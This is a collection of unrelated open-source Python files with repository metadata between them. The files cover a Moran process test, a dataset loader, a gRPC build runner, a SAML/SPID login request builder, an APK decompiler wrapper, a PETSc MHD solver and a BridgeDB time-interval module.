for i in range(0, 3):
pop = np.random.randint(1, 10, 5) # random population with 5 strategies
zero_element = np.random.randint(0, 5)
pop[zero_element] = 0
pop_size = np.sum(pop)
mp = MoranProcess(population_size=pop_size,
intensity_of_selection=1.0, game_matrix=np.random.rand(5, 5),
number_of_strategies=5, fitness_mapping='exp', mutation_probability=0.1)
for j in range(0, 1000):
pop = mp.step(pop, mutation_step=False)[0]
self.assertEqual(pop[zero_element], 0, "Type " + str(zero_element) + " showed up in population " + str(
pop) + " at iteration " + str(i) + " " + str(j))
def test_fixation_of_neutral_mutant(self):
number_of_strategies_value = 2
number_of_samples_ = 10000
for _ in range(0, 5):
pop_size = np.random.randint(2, 11)
mp = MoranProcess(population_size=pop_size,
intensity_of_selection=0.0,
game_matrix=np.random.rand(number_of_strategies_value, number_of_strategies_value),
number_of_strategies=number_of_strategies_value, fitness_mapping='exp',
mutation_probability=0.1)
fix = mp.simulate_fixation_probability(0, 1, number_of_samples=number_of_samples_, seed=None)
np.testing.assert_allclose(fix, 1.0 / pop_size, rtol=0.01, atol=0.01, err_msg="Paila", verbose=True)
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 51.272059
| 119
| 0.597591
|
794db6894239ea4f65ede0a38067e7d98f5164f0
| 3,460
|
py
|
Python
|
datasets/opinosis/opinosis.py
|
dkajtoch/datasets
|
12ef7f0d541a5aca5b29ebc2dddf5e1214f0e3e9
|
[
"Apache-2.0"
] | 9
|
2021-04-26T14:43:52.000Z
|
2021-11-08T09:47:24.000Z
|
datasets/opinosis/opinosis.py
|
jramapuram/huggingface_datasets
|
62c7ac0783a00bdc1192b6a75439a65d522b6cbc
|
[
"Apache-2.0"
] | null | null | null |
datasets/opinosis/opinosis.py
|
jramapuram/huggingface_datasets
|
62c7ac0783a00bdc1192b6a75439a65d522b6cbc
|
[
"Apache-2.0"
] | 3
|
2021-01-03T22:08:20.000Z
|
2021-08-12T20:09:39.000Z
|
# coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors and the HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Opinosis Opinion Dataset."""
from __future__ import absolute_import, division, print_function
import os
import datasets
_CITATION = """
@inproceedings{ganesan2010opinosis,
title={Opinosis: a graph-based approach to abstractive summarization of highly redundant opinions},
author={Ganesan, Kavita and Zhai, ChengXiang and Han, Jiawei},
booktitle={Proceedings of the 23rd International Conference on Computational Linguistics},
pages={340--348},
year={2010},
organization={Association for Computational Linguistics}
}
"""
_DESCRIPTION = """
The Opinosis Opinion Dataset consists of sentences extracted from reviews for 51 topics.
Topics and opinions are obtained from Tripadvisor, Edmunds.com and Amazon.com.
"""
_URL = "https://github.com/kavgan/opinosis-summarization/raw/master/OpinosisDataset1.0_0.zip"
_REVIEW_SENTS = "review_sents"
_SUMMARIES = "summaries"
class Opinosis(datasets.GeneratorBasedBuilder):
"""Opinosis Opinion Dataset."""
VERSION = datasets.Version("1.0.0")
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
_REVIEW_SENTS: datasets.Value("string"),
_SUMMARIES: datasets.features.Sequence(datasets.Value("string")),
}
),
supervised_keys=(_REVIEW_SENTS, _SUMMARIES),
homepage="http://kavita-ganesan.com/opinosis/",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
extract_path = dl_manager.download_and_extract(_URL)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={"path": extract_path},
),
]
def _generate_examples(self, path=None):
"""Yields examples."""
topics_path = os.path.join(path, "topics")
filenames = sorted(os.listdir(topics_path))
for filename in filenames:
file_path = os.path.join(topics_path, filename)
topic_name = filename.split(".txt")[0]
with open(file_path, "rb") as src_f:
input_data = src_f.read().decode("latin-1")
summaries_path = os.path.join(path, "summaries-gold", topic_name)
summary_lst = []
for summ_filename in sorted(os.listdir(summaries_path)):
file_path = os.path.join(summaries_path, summ_filename)
with open(file_path, "rb") as tgt_f:
data = tgt_f.read().strip().decode("latin-1")
summary_lst.append(data)
summary_data = summary_lst
yield filename, {_REVIEW_SENTS: input_data, _SUMMARIES: summary_data}
| 36.421053
| 101
| 0.665029
|
794db6e1be0e854c53f2116da18be815e2f22235
| 3,876
|
py
|
Python
|
tools/run_tests/task_runner.py
|
samotarnik/grpc
|
3278bdceda8030d5aa130f12765e5f07263c860d
|
[
"Apache-2.0"
] | 2,151
|
2020-04-18T07:31:17.000Z
|
2022-03-31T08:39:18.000Z
|
tools/run_tests/task_runner.py
|
samotarnik/grpc
|
3278bdceda8030d5aa130f12765e5f07263c860d
|
[
"Apache-2.0"
] | 395
|
2020-04-18T08:22:18.000Z
|
2021-12-08T13:04:49.000Z
|
tools/run_tests/task_runner.py
|
samotarnik/grpc
|
3278bdceda8030d5aa130f12765e5f07263c860d
|
[
"Apache-2.0"
] | 338
|
2020-04-18T08:03:10.000Z
|
2022-03-29T12:33:22.000Z
|
#!/usr/bin/env python
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs selected gRPC test/build tasks."""
from __future__ import print_function
import argparse
import multiprocessing
import sys
import artifacts.artifact_targets as artifact_targets
import artifacts.distribtest_targets as distribtest_targets
import artifacts.package_targets as package_targets
import python_utils.jobset as jobset
import python_utils.report_utils as report_utils
_TARGETS = []
_TARGETS += artifact_targets.targets()
_TARGETS += distribtest_targets.targets()
_TARGETS += package_targets.targets()
def _create_build_map():
"""Maps task names and labels to list of tasks to be built."""
target_build_map = dict([(target.name, [target]) for target in _TARGETS])
if len(_TARGETS) > len(target_build_map.keys()):
raise Exception('Target names need to be unique')
label_build_map = {}
label_build_map['all'] = [t for t in _TARGETS] # to build all targets
for target in _TARGETS:
for label in target.labels:
if label in label_build_map:
label_build_map[label].append(target)
else:
label_build_map[label] = [target]
if set(target_build_map.keys()).intersection(label_build_map.keys()):
raise Exception('Target names need to be distinct from label names')
return dict(target_build_map.items() + label_build_map.items())
_BUILD_MAP = _create_build_map()
argp = argparse.ArgumentParser(description='Runs build/test targets.')
argp.add_argument(
'-b',
'--build',
choices=sorted(_BUILD_MAP.keys()),
nargs='+',
default=['all'],
help='Target name or target label to build.')
argp.add_argument(
'-f',
'--filter',
choices=sorted(_BUILD_MAP.keys()),
nargs='+',
default=[],
help='Filter targets to build with AND semantics.')
argp.add_argument('-j', '--jobs', default=multiprocessing.cpu_count(), type=int)
argp.add_argument(
'-t', '--travis', default=False, action='store_const', const=True)
args = argp.parse_args()
# Figure out which targets to build
targets = []
for label in args.build:
targets += _BUILD_MAP[label]
# Among targets selected by -b, filter out those that don't match the filter
targets = [t for t in targets if all(f in t.labels for f in args.filter)]
targets = sorted(set(targets))
# Execute pre-build phase
prebuild_jobs = []
for target in targets:
prebuild_jobs += target.pre_build_jobspecs()
if prebuild_jobs:
num_failures, _ = jobset.run(
prebuild_jobs, newline_on_success=True, maxjobs=args.jobs)
if num_failures != 0:
jobset.message('FAILED', 'Pre-build phase failed.', do_newline=True)
sys.exit(1)
build_jobs = []
for target in targets:
build_jobs.append(target.build_jobspec())
if not build_jobs:
print('Nothing to build.')
sys.exit(1)
jobset.message('START', 'Building targets.', do_newline=True)
num_failures, resultset = jobset.run(
build_jobs, newline_on_success=True, maxjobs=args.jobs)
report_utils.render_junit_xml_report(
resultset, 'report_taskrunner_sponge_log.xml', suite_name='tasks')
if num_failures == 0:
jobset.message(
'SUCCESS', 'All targets built successfully.', do_newline=True)
else:
jobset.message('FAILED', 'Failed to build targets.', do_newline=True)
sys.exit(1)
| 33.413793
| 80
| 0.718008
|
794db81583e691d9cd6471733e9881289a39da13
| 2,751
|
py
|
Python
|
src/djangosaml2_spid/spid_request.py
|
Martini991/spid-django
|
8f1ce59e01e3972006c75ff672b9c56a4d1234d4
|
[
"Apache-2.0"
] | 1
|
2021-12-06T14:58:24.000Z
|
2021-12-06T14:58:24.000Z
|
src/djangosaml2_spid/spid_request.py
|
damikael/spid-django
|
3ca45df31195541ac669503dc85ae753254c6d00
|
[
"Apache-2.0"
] | null | null | null |
src/djangosaml2_spid/spid_request.py
|
damikael/spid-django
|
3ca45df31195541ac669503dc85ae753254c6d00
|
[
"Apache-2.0"
] | null | null | null |
import logging
import saml2
from django.conf import settings
from django.urls import reverse
from djangosaml2.overrides import Saml2Client
from saml2.authn_context import requested_authn_context
SAML2_DEFAULT_BINDING = getattr(
settings, 'SAML2_DEFAULT_BINDING', saml2.BINDING_HTTP_POST
)
logger = logging.getLogger('djangosaml2')
def spid_sp_authn_request(conf, selected_idp, next_url=''):
client = Saml2Client(conf)
logger.debug(f'Redirecting user to the IdP via {SAML2_DEFAULT_BINDING} binding.')
# use the html provided by pysaml2 if no template was specified or it didn't exist
# SPID want the fqdn of the IDP, not the SSO endpoint
location_fixed = selected_idp
location = client.sso_location(selected_idp, SAML2_DEFAULT_BINDING)
authn_req = saml2.samlp.AuthnRequest()
authn_req.destination = location_fixed
# spid-testenv2 preleva l'attribute consumer service dalla authnRequest (anche se questo sta già nei metadati...)
authn_req.attribute_consuming_service_index = "0"
# issuer
issuer = saml2.saml.Issuer()
issuer.name_qualifier = client.config.entityid
issuer.text = client.config.entityid
issuer.format = "urn:oasis:names:tc:SAML:2.0:nameid-format:entity"
authn_req.issuer = issuer
# message id
authn_req.id = saml2.s_utils.sid()
authn_req.version = saml2.VERSION # "2.0"
authn_req.issue_instant = saml2.time_util.instant()
name_id_policy = saml2.samlp.NameIDPolicy()
name_id_policy.format = settings.SPID_NAMEID_FORMAT
authn_req.name_id_policy = name_id_policy
authn_context = requested_authn_context(class_ref=settings.SPID_AUTH_CONTEXT)
authn_req.requested_authn_context = authn_context
# if SPID authentication level is > 1 then forceauthn must be True
authn_req.force_authn = 'true'
authn_req.protocol_binding = SAML2_DEFAULT_BINDING
assertion_consumer_service_url = client.config._sp_endpoints['assertion_consumer_service'][0][0]
authn_req.assertion_consumer_service_url = assertion_consumer_service_url
authn_req_signed = client.sign(
authn_req,
sign_prepare=False,
sign_alg=settings.SPID_SIG_ALG,
digest_alg=settings.SPID_DIG_ALG,
)
logger.debug(f'AuthRequest to {selected_idp}: {authn_req_signed}')
relay_state = next_url or reverse('djangosaml2:saml2_echo_attributes')
http_info = client.apply_binding(
SAML2_DEFAULT_BINDING,
authn_req_signed,
location,
sign=True,
sigalg=settings.SPID_SIG_ALG,
relay_state=relay_state
)
return dict(
http_response=http_info,
authn_request=authn_req_signed,
relay_state=relay_state,
session_id=authn_req.id
)
| 32.75
| 117
| 0.744457
|
794db86c0f04c54e26810ea29f0f98d549f3d0b4
| 3,540
|
py
|
Python
|
decompile.py
|
grievejia/ApkToJava
|
e38ced1abe778b8797f0bc2b784a1a6fa829b3c4
|
[
"MIT"
] | 3
|
2017-08-22T09:48:21.000Z
|
2021-02-07T21:28:26.000Z
|
decompile.py
|
grievejia/ApkToJava
|
e38ced1abe778b8797f0bc2b784a1a6fa829b3c4
|
[
"MIT"
] | null | null | null |
decompile.py
|
grievejia/ApkToJava
|
e38ced1abe778b8797f0bc2b784a1a6fa829b3c4
|
[
"MIT"
] | 2
|
2017-05-24T15:19:36.000Z
|
2021-02-07T21:28:27.000Z
|
#!/usr/bin/env python3
"""
Android decompiler
"""
from argparse import ArgumentParser
import logging
from pathlib import Path
import sys
import subprocess
from tempfile import TemporaryDirectory
__author__ = 'Grievejia'
__version__ = '0.1'
def sanity_check(args):
for filepath in args.files:
if not filepath.exists():
logging.error('File does not exist: %s', str(filepath))
return False
elif not filepath.is_file():
logging.error('%s is not a file', str(filepath))
return False
elif filepath.suffix != '.apk':
logging.error('%s is not an .apk file', str(filepath))
return False
if not args.output.exists():
logging.error('Output direcory not exist: %s', str(args.output))
return False
elif not args.output.is_dir():
logging.error('Output is not a directory: %s', str(args.output))
return False
return True
def main(args):
script_path = Path(__file__).resolve().parent
dex2jar_path = script_path.joinpath('dex2jar', 'd2j-dex2jar.sh')
if not dex2jar_path.exists() or not dex2jar_path.is_file():
logging.critical('dex2jar not found in %s', str(dex2jar_path))
sys.exit(-1)
cfr_path = script_path.joinpath('cfr.jar')
if not cfr_path.exists() or not cfr_path.is_file():
logging.critical('cfr not found in %s', str(cfr_path))
sys.exit(-1)
with TemporaryDirectory() as temp_dir:
for filepath in args.files:
print('Converting %s to jar...' % str(filepath))
tmp_jar = '%s/%s.jar' % (temp_dir, filepath.stem)
dex2jar_cmd = [str(dex2jar_path), str(filepath), '-o', tmp_jar]
logging.info('dex2jar command: %s', ' '.join(dex2jar_cmd))
try:
subprocess.run(dex2jar_cmd)
except subprocess.CalledProcessError:
logging.error('dex2jar execution failed.', exc_info=True)
system.exit(-1)
print('Decompiling jar file...')
cfr_cmd = ['/usr/bin/env', 'java', '-jar', str(cfr_path), tmp_jar, '--outputdir', str(args.output)]
logging.info('cfr command: %s', ' '.join(cfr_cmd))
try:
subprocess.run(cfr_cmd)
except subprocess.CalledProcessError:
logging.error('cfr execution failed.', exc_info=True)
system.exit(-1)
print('Decompilation done. Output in %s' % str(args.output))
epilog = 'system (default) encoding: {}'.format(sys.getdefaultencoding())
parser = ArgumentParser(
usage='%(prog)s [options] [FILE ...]',
description=__doc__, epilog=epilog,
prog=Path(sys.argv[0]).name
)
parser.add_argument('files', metavar='FILE', nargs='*', type=Path,
help='input apk file(s)')
parser.add_argument('--version', action='version', version=__version__)
parser.add_argument('--verbose', '-v', action='count', default=0,
help='increase log level [WARN]')
parser.add_argument('--quiet', '-q', action='count', default=0,
help='decrease log level [WARN]')
parser.add_argument('--logfile', metavar='FILE',
help='log to file instead of <STDERR>')
parser.add_argument('--output', '-o', type=Path, help='specify the dir of output', default=Path('.'))
args = parser.parse_args()
# Logging setup
log_adjust = max(min(args.quiet - args.verbose, 2), -2) * 10
logging.basicConfig(filename=args.logfile, level=logging.WARNING + log_adjust,
format='%(levelname)-8s %(module) 10s: %(funcName)s %(message)s')
logging.info('verbosity increased')
logging.debug('verbosity increased')
if not sanity_check(args):
sys.exit(-1)
logging.debug('Input apks: %s', ' '.join([str(x) for x in args.files]))
logging.debug('Output dir: %s', str(args.output))
main(args)
| 34.368932
| 102
| 0.682768
|
794db8b09ddaa218c809057b5bd1e0e8ce83b040
| 2,512
|
py
|
Python
|
core_tools/sweeps/pulse_lib_wrappers/PSB_exp.py
|
peendebak/core_tools
|
2e43edf0bbc1d7ceb7042559db499535e8f6a076
|
[
"BSD-2-Clause"
] | null | null | null |
core_tools/sweeps/pulse_lib_wrappers/PSB_exp.py
|
peendebak/core_tools
|
2e43edf0bbc1d7ceb7042559db499535e8f6a076
|
[
"BSD-2-Clause"
] | null | null | null |
core_tools/sweeps/pulse_lib_wrappers/PSB_exp.py
|
peendebak/core_tools
|
2e43edf0bbc1d7ceb7042559db499535e8f6a076
|
[
"BSD-2-Clause"
] | null | null | null |
from core_tools.utility.digitizer_param_conversions import IQ_to_scalar, down_sampler,data_reshaper, PSB_param, get_phase_compentation_IQ_signal
from core_tools.utility.mk_digitizer_param import get_digitizer_param
from core_tools.utility.dig_utility import autoconfig_dig_v2, MODES
from core_tools.drivers.M3102A import MODES, DATA_MODE, OPERATION_MODES
from core_tools.sweeps.sweep_utility import check_OD_scan
from core_tools.HVI2.schedule_manager import ScheduleMgr
from core_tools.utility.qubit_param_gen.digitizer_parameter import get_digitizer_qubit_param
import qcodes as qc
from pulse_lib.segments.utility.measurement_converter import measurement_converter
from pulse_lib.configuration.physical_channels import digitizer_channel_iq
from pulse_lib.keysight.qs_uploader import QsUploader
def add_schedule_to_lambda(schedule):
def new_lamdba(seq):
seq.set_hw_schedule(schedule)
return new_lamdba
def run_qubit_exp(exp_name, sequence, mode = 'normal'):
'''
Args:
exp_name (str) : name of the experiment
sequence (sequence_builder) : sequence builder
'''
station = qc.Station.default
my_seq = sequence.forge()
my_seq.neutralise = True
my_seq.n_rep = sequence.n_rep
md = my_seq.measurements_description
n_acq = md.acquisition_count
station.dig.set_operating_mode(OPERATION_MODES.HVI_TRG)
station.dig.set_acquisition_mode(MODES.IQ_INPUT_SHIFTED_I_OUT)
active_channels = []
if not QsUploader.use_digitizer_sequencers:
print(f'QsUploader.use_digitizer_sequencers set to {QsUploader.use_digitizer_sequencers}')
for channel_name in md.acquisitions:
dig_channel = station.pulse.digitizer_channels[channel_name]
for ch in dig_channel.channel_numbers:
if n_acq[channel_name] > 0:
station.dig.set_channel_properties(ch, V_range=1.0)
station.dig.set_daq_settings(ch, my_seq.n_rep*n_acq[channel_name], 30)
active_channels.append(ch)
station.dig.set_active_channels(active_channels)
starting_lambda = add_schedule_to_lambda(ScheduleMgr().single_shot())
my_seq.starting_lambda = starting_lambda
mc = measurement_converter(md, my_seq.n_rep)
if mode == 'normal':
dig_param = mc.less_results()
else:
dig_param = mc.state_tomography_results()
dig_param.setUpParam(mc, station.dig)
my_seq.m_param = dig_param
return check_OD_scan(my_seq, dig_param) + (exp_name, )
| 36.405797
| 144
| 0.759952
|
794db934a7ddd4480315d1ea9d71cf1feecf077a
| 5,622
|
py
|
Python
|
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/P1P1/Solver.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | 3
|
2020-10-25T13:30:20.000Z
|
2021-08-10T21:27:30.000Z
|
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/P1P1/Solver.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | null | null | null |
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/P1P1/Solver.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | 3
|
2019-10-28T16:12:13.000Z
|
2020-01-13T13:59:44.000Z
|
from dolfin import assemble, MixedFunctionSpace, tic,toc
import petsc4py
import sys
petsc4py.init(sys.argv)
from petsc4py import PETSc
import CheckPetsc4py as CP
import StokesPrecond
import NSpreconditioner
import MaxwellPrecond as MP
import MatrixOperations as MO
import PETScIO as IO
import numpy as np
import P as PrecondMulti
import MHDprec
import scipy.sparse as sp
from scipy.linalg import svd
import matplotlib.pylab as plt
from scipy.sparse.linalg.dsolve import spsolve
def solve(A,b,u,params, Fspace,SolveType,IterType,OuterTol,InnerTol,HiptmairMatrices,Hiptmairtol,KSPlinearfluids, Fp,kspF):
if SolveType == "Direct":
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
pc = ksp.getPC()
ksp.setType('preonly')
pc.setType('lu')
OptDB = PETSc.Options()
OptDB['pc_factor_mat_solver_package'] = "pastix"
OptDB['pc_factor_mat_ordering_type'] = "rcm"
ksp.setFromOptions()
scale = b.norm()
b = b/scale
ksp.setOperators(A,A)
del A
ksp.solve(b,u)
# Mits +=dodim
u = u*scale
MO.PrintStr("Number iterations = "+str(ksp.its),60,"+","\n\n","\n\n")
return u,ksp.its,0
elif SolveType == "Direct-class":
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
pc = ksp.getPC()
ksp.setType('gmres')
pc.setType('none')
ksp.setFromOptions()
scale = b.norm()
b = b/scale
ksp.setOperators(A,A)
del A
ksp.solve(b,u)
# Mits +=dodim
u = u*scale
MO.PrintStr("Number iterations = "+str(ksp.its),60,"+","\n\n","\n\n")
return u,ksp.its,0
else:
# u = b.duplicate()
if IterType == "Full":
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
pc = ksp.getPC()
ksp.setType('fgmres')
pc.setType('python')
pc.setType(PETSc.PC.Type.PYTHON)
OptDB = PETSc.Options()
OptDB['ksp_gmres_restart'] = 200
# FSpace = [Velocity,Magnetic,Pressure,Lagrange]
reshist = {}
def monitor(ksp, its, fgnorm):
reshist[its] = fgnorm
print its," OUTER:", fgnorm
# ksp.setMonitor(monitor)
ksp.max_it = 500
W = Fspace
FFSS = [W.sub(0),W.sub(1),W.sub(2),W.sub(3)]
pc.setPythonContext(MHDprec.InnerOuterMAGNETICapprox(FFSS,kspF, KSPlinearfluids[0], KSPlinearfluids[1],Fp, HiptmairMatrices[3], HiptmairMatrices[4], HiptmairMatrices[2], HiptmairMatrices[0], HiptmairMatrices[1], HiptmairMatrices[6],Hiptmairtol))
#OptDB = PETSc.Options()
# OptDB['pc_factor_mat_solver_package'] = "mumps"
# OptDB['pc_factor_mat_ordering_type'] = "rcm"
# ksp.setFromOptions()
scale = b.norm()
b = b/scale
ksp.setOperators(A,A)
del A
ksp.solve(b,u)
# Mits +=dodim
u = u*scale
MO.PrintStr("Number iterations = "+str(ksp.its),60,"+","\n\n","\n\n")
return u,ksp.its,0
IS = MO.IndexSet(Fspace,'2by2')
M_is = IS[1]
NS_is = IS[0]
kspNS = PETSc.KSP().create()
kspM = PETSc.KSP().create()
kspNS.setTolerances(OuterTol)
kspNS.setOperators(A[0])
kspM.setOperators(A[1])
# print P.symmetric
if IterType == "MD":
kspNS.setType('gmres')
kspNS.max_it = 500
pcNS = kspNS.getPC()
pcNS.setType(PETSc.PC.Type.PYTHON)
pcNS.setPythonContext(NSpreconditioner.NSPCD(MixedFunctionSpace([Fspace.sub(0),Fspace.sub(1)]), kspF, KSPlinearfluids[0], KSPlinearfluids[1],Fp))
elif IterType == "CD":
kspNS.setType('minres')
pcNS = kspNS.getPC()
pcNS.setType(PETSc.PC.Type.PYTHON)
Q = KSPlinearfluids[1].getOperators()[0]
Q = 1./params[2]*Q
KSPlinearfluids[1].setOperators(Q,Q)
pcNS.setPythonContext(StokesPrecond.MHDApprox(MixedFunctionSpace([Fspace.sub(0),Fspace.sub(1)]),kspF,KSPlinearfluids[1] ))
reshist = {}
def monitor(ksp, its, fgnorm):
reshist[its] = fgnorm
print fgnorm
# kspNS.setMonitor(monitor)
uNS = u.getSubVector(NS_is)
bNS = b.getSubVector(NS_is)
# print kspNS.view()
scale = bNS.norm()
bNS = bNS/scale
print bNS.norm()
kspNS.solve(bNS, uNS)
uNS = uNS*scale
NSits = kspNS.its
kspNS.destroy()
# for line in reshist.values():
# print line
kspM.setFromOptions()
kspM.setType(kspM.Type.MINRES)
kspM.setTolerances(InnerTol)
pcM = kspM.getPC()
pcM.setType(PETSc.PC.Type.PYTHON)
pcM.setPythonContext(MP.Hiptmair(MixedFunctionSpace([Fspace.sub(2),Fspace.sub(3)]), HiptmairMatrices[3], HiptmairMatrices[4], HiptmairMatrices[2], HiptmairMatrices[0], HiptmairMatrices[1], HiptmairMatrices[6],Hiptmairtol))
uM = u.getSubVector(M_is)
bM = b.getSubVector(M_is)
scale = bM.norm()
bM = bM/scale
print bM.norm()
kspM.solve(bM, uM)
uM = uM*scale
Mits = kspM.its
kspM.destroy()
u = IO.arrayToVec(np.concatenate([uNS.array, uM.array]))
MO.PrintStr("Number of M iterations = "+str(Mits),60,"+","\n\n","\n\n")
MO.PrintStr("Number of NS/S iterations = "+str(NSits),60,"+","\n\n","\n\n")
return u,NSits,Mits
| 33.464286
| 257
| 0.574884
|
794db9d6baaa01685f9b80350dd55255b583f8a3
| 4,644
|
py
|
Python
|
lib/bridgedb/Time.py
|
wfn/bridgedb
|
f266f32c365eb7a16cf156cc02f7e492266a7b51
|
[
"BSD-3-Clause-Clear"
] | 1
|
2016-09-21T12:55:21.000Z
|
2016-09-21T12:55:21.000Z
|
lib/bridgedb/Time.py
|
wfn/bridgedb
|
f266f32c365eb7a16cf156cc02f7e492266a7b51
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
lib/bridgedb/Time.py
|
wfn/bridgedb
|
f266f32c365eb7a16cf156cc02f7e492266a7b51
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# BridgeDB by Nick Mathewson.
# Copyright (c) 2007-2009, The Tor Project, Inc.
# See LICENSE for licensing information
"""
This module implements functions for dividing time into chunks.
"""
import calendar
import time
KNOWN_INTERVALS = [ "hour", "day", "week", "month" ]
class Schedule:
def intervalStart(self, when):
raise NotImplementedError
def getInterval(self, when):
raise NotImplementedError
def nextIntervalStarts(self, when):
raise NotImplementedError
class IntervalSchedule(Schedule):
"""An IntervalSchedule splits time into somewhat natural periods,
based on hours, days, weeks, or months.
"""
## Fields:
## itype -- one of "month", "day", "hour".
## count -- how many of the units in itype belong to each period.
def __init__(self, intervaltype, count):
"""Create a new IntervalSchedule.
intervaltype -- one of month, week, day, hour.
count -- how many of the units in intervaltype belong to each
period.
"""
it = intervaltype.lower()
if it.endswith("s"): it = it[:-1]
if it not in KNOWN_INTERVALS:
raise TypeError("What's a %s?"%it)
assert count > 0
if it == 'week':
it = 'day'
count *= 7
self.itype = it
self.count = count
def intervalStart(self, when):
"""Return the time (as an int) of the start of the interval containing
'when'."""
if self.itype == 'month':
# For months, we always start at the beginning of the month.
tm = time.gmtime(when)
n = tm.tm_year * 12 + tm.tm_mon - 1
n -= (n % self.count)
month = n%12 + 1
return calendar.timegm((n//12, month, 1, 0, 0, 0))
elif self.itype == 'day':
# For days, we start at the beginning of a day.
when -= when % (86400 * self.count)
return when
elif self.itype == 'hour':
# For hours, we start at the beginning of an hour.
when -= when % (3600 * self.count)
return when
else:
assert False
def getInterval(self, when):
"""Return a string representing the interval that contains the time
**when**.
>>> import calendar
>>> from bridgedb.Time import IntervalSchedule
>>> t = calendar.timegm((2007, 12, 12, 0, 0, 0))
>>> I = IntervalSchedule('month', 1)
>>> I.getInterval(t)
'2007-12'
:param int when: The time which we're trying to find the corresponding
interval for.
:rtype: str
:returns: A timestamp in the form ``YEAR-MONTH[-DAY[-HOUR]]``. It's
specificity depends on what type of interval we're
using. For example, if using ``"month"``, the return value
would be something like ``"2013-12"``.
"""
if self.itype == 'month':
tm = time.gmtime(when)
n = tm.tm_year * 12 + tm.tm_mon - 1
n -= (n % self.count)
month = n%12 + 1
return "%04d-%02d" % (n // 12, month)
elif self.itype == 'day':
when = self.intervalStart(when) + 7200 #slop
tm = time.gmtime(when)
return "%04d-%02d-%02d" % (tm.tm_year, tm.tm_mon, tm.tm_mday)
elif self.itype == 'hour':
when = self.intervalStart(when) + 120 #slop
tm = time.gmtime(when)
return "%04d-%02d-%02d %02d" % (tm.tm_year, tm.tm_mon, tm.tm_mday,
tm.tm_hour)
else:
assert False
def nextIntervalStarts(self, when):
"""Return the start time of the interval starting _after_ when."""
if self.itype == 'month':
tm = time.gmtime(when)
n = tm.tm_year * 12 + tm.tm_mon - 1
n -= (n % self.count)
month = n%12 + 1
tm = (n // 12, month+self.count, 1, 0,0,0)
return calendar.timegm(tm)
elif self.itype == 'day':
return self.intervalStart(when) + 86400 * self.count
elif self.itype == 'hour':
return self.intervalStart(when) + 3600 * self.count
class NoSchedule(Schedule):
"""A stub-implementation of Schedule that has only one period for
all time."""
def __init__(self):
pass
def intervalStart(self, when):
return 0
def getInterval(self, when):
return "1970"
def nextIntervalStarts(self, when):
return 2147483647L # INT32_MAX
| 35.723077
| 78
| 0.546296
|
794dbb0ee7e8b8350c669427147314eccfd919bd
| 347
|
py
|
Python
|
gge_proxy_manager/tasks.py
|
mrcrgl/gge-storage
|
a8471624c1a865d4f7eeb00415bd4cd2a91ea310
|
[
"MIT"
] | null | null | null |
gge_proxy_manager/tasks.py
|
mrcrgl/gge-storage
|
a8471624c1a865d4f7eeb00415bd4cd2a91ea310
|
[
"MIT"
] | 1
|
2015-04-09T15:58:19.000Z
|
2015-04-14T06:37:02.000Z
|
gge_proxy_manager/tasks.py
|
mrcrgl/gge-storage
|
a8471624c1a865d4f7eeb00415bd4cd2a91ea310
|
[
"MIT"
] | null | null | null |
from .methods import clean_duplicate_players, clean_duplicate_alliances, clean_duplicate_castles
import celery
@celery.task
def clean_duplicates(*args, **kwargs):
print "Clean castles..."
clean_duplicate_castles()
print "Clean players..."
clean_duplicate_players()
print "Clean alliances..."
clean_duplicate_alliances()
| 24.785714
| 96
| 0.757925
|
794dbb832780aa5cdaa4f8a1ca99c6dd5bd6f288
| 3,078
|
py
|
Python
|
python/helpers/pydev/_pydev_bundle/pydev_ipython_code_executor.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
python/helpers/pydev/_pydev_bundle/pydev_ipython_code_executor.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
python/helpers/pydev/_pydev_bundle/pydev_ipython_code_executor.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
import sys
import traceback
from _pydev_bundle.pydev_code_executor import BaseCodeExecutor
from _pydev_bundle.pydev_ipython_console_011 import get_pydev_ipython_frontend
from _pydevd_bundle.pydevd_constants import dict_iter_items
# Uncomment to force PyDev standard shell.
# raise ImportError()
# TODO reuse `CodeExecutor` in `InterpreterInterface` in pydev_ipython_console.py
#=======================================================================================================================
# IPythonCodeExecutor
#=======================================================================================================================
